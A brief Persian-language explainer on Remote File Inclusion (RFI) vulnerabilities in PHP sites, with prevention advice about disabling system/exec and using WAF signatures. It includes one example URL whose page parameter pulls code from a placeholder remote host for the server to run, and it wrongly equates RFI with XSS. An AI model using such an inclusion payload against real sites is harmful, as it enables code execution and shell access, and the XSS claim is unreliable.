Remote File Inclusion یا RFI چیست؟

images

Remote File Inclusion یا به اختصار RFI به هکرها اجازه می دهد تا به وسیله یک اسکریپت، اقدام به آپلود کد و فایلهای آلوده روی سرور کنند. این مورد در صورت وجود آسیب پذیری در سرور و یا وب سایت، به وسیله تزریق کد یا همان XSS انجام می گردد. در صورت وجود این آسیب پذیری، می تواند منجر به ارائه دسترسی Deface سایت، دسترسی اجرای دستورات و در نتیجه دسترسی shell گردد.

به طور مثال دستور زیر می تواند یک کد را از طریق URL در سرور اجرا نماید.

http://example.something/index.php?page=http://url/file.txt

توجه داشته باشید که کد مخرب در فایل متنی نوشته می شود. این مورد معمولا با غیر فعال نمودن توابع خطرناک php نظیر system و exec و … قابل پیشگیری است. ولی جهت امنیت بالاتر، می بایست از Signature های تشخیص حملات RFI در WAF های نرم افزاری/سخت افزاری استفاده نمود.


پاسخ دهید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

16 − چهارده =